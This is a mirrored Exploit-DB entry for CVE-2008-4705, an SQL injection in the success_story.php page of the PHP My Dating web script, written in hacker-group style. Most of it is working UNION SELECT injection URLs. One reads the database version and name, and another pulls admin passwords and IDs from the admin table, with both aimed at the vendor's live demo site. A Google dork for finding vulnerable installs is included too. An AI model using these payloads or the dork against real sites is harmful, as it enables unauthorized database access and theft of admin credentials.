- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 6754
- Проверка EDB
-
- Пройдено
- Автор
- HAKXER
- Тип уязвимости
- WEBAPPS
- Платформа
- PHP
- CVE
- cve-2008-4705
- Дата публикации
- 2008-10-14
Код:
###############################################################################################
_____ ____ __ ___ ______ ______ | ____ _____ _____
| / ___| \ \ / / / ____| / | | | | _ \ |
|_____ | | _ \ V / | | | | ___| |_____ | |_) | |_____
| | |_ || | | | |____ | | | | | | _ | |
|_____ \____| |_| \_____| \_____/ |___| |____ |__| \_\ ______|
# Author : Hakxer
# Home : Www.educ-up.com
# Type Gap : Sq1 inj3ct1on
# script : PHP MY DATING [see script] http://www.phponlinedatingsoftware.com/demo.htm
# Greetz : Allah , Egyptian x Hacker , Soufiane , Sinaritx , SQL_inj4ct0r , Stealth , Kof2002 ,Bright D@rk , Thrid Devil
# Team : EgY Coders
#################################################################################################
####### [+] Bug in : success_story.php
## Dork : " Developed by Infoware Solutions "
### POC
http://www.site.com/success_story.php?id=-2+union+select+1,2,concat(@@version,0x3e,database())--
### Exploit iN L!ve Script
# [+] Get Version & Database Name [~]
# http://www.phponlinedatingsoftware.com/demo/success_story.php?id=-2+union+select+1,2,concat(@@version,0x3e,database())--
# [+] Get ID&Pass [~]
# http://www.phponlinedatingsoftware.com/demo/success_story.php?id=-2+union+select+1,2,concat(m_pass,0x3e,admin_id)+from+infowar1_cms.baq_admin--
# [+] HaVe Fun .. ^_^ ;
###############################################################################
-------------------------------- The End of Gap -----------------------------------
## Contact : [email protected]
### Muslim Hacker .. I love you Mohammed Rasull Allah
######################################################
# milw0rm.com [2008-10-14]- Источник
- www.exploit-db.com
